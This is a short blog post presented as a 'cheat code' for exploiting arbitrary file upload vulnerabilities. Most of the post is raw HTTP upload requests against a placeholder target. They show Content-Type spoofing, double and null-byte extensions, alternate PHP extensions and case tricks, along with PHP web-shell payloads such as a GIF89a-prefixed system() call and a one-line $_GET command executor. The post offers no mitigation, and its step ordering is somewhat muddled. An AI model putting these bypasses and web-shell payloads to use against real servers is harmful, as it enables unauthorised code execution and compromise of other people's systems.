Cheat code for file upload vulnerability by kidnapshadow

kidnapshadowKidnapshadow -
0

 

File Upload vulnerability

File Upload vulnerability

Introduction

An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.

Where to find

In upload file feature, for example upload photo, pdf, file feature.

How to exploit

follow step for find file upload vulnerability.

step1: you have to find any file uploading page on web application.

step2: you direct upload file.

step3: when you upload file it only upload image file.

step4: - you upload file in php format and go to burp suite change extension jpeg or file.php.jpeg.

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpeg"
Content-Type: application/x-php

step5: open terminal and set listner to intercept the request. and boom got shell

  1. Change the Content-Type value.
POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

Change the Content-Type

POST /images/upload/ HTTP/1.1
Host: target.com

Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
  1. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
POST /images/upload/ HTTP/1.1
Host: target.com
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php---------------------------829348923824

Change the request to this

POST /images/upload/ HTTP/1.1
Host: target.com
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

2. Upload the payload, but start with GIF89a; and

POST /images/upload/ HTTP/1.1
Host: target.com
...
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif
GIF89a; <?php system("id") ?>

And dont forget to change the content-type to image/gif

3. Bypass content length validation, it can be bypassed using small payload

(<?=`$_GET[x]`?>)

4. Using null byte in filename

file.php%00.gif

5. Using double extensions for the uploaded file

file.jpg.php1

6. Uploading an unpopular php extensions (php4,php5,php6,phtml)

file.php5

7. Try to randomly capitalizes the file extension

file.pHP5
Tags:
Kidnapshadow

Hey everyone, This side sidharth cybersecurity | ethical hacking https://medium.com/@kidnapshadow

Post a Comment

Post a Comment (0)

Previous Post Next Post